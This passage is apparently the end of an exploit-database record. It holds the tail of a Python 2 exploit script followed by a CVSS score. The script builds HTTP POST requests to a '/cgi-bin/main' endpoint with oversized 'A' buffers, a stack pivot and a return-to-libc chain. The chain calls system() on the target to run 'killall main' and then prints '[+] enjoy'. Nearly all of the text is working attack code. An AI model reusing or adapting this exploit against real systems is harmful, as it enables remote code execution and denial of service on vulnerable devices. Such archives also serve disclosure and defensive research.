struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\nmsg += \"A\" * 100\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n\ntime.sleep(1)\n\n\nprint \"[+] cleaning up\"\n###################################################################\n#\n# Kill all mains that are hung-up\n#\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\n\ncommand = 'killall main'\n\nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", some_str )\nmsg += command + \"\\x00\"\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n\nprint \"[+] enjoy\"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}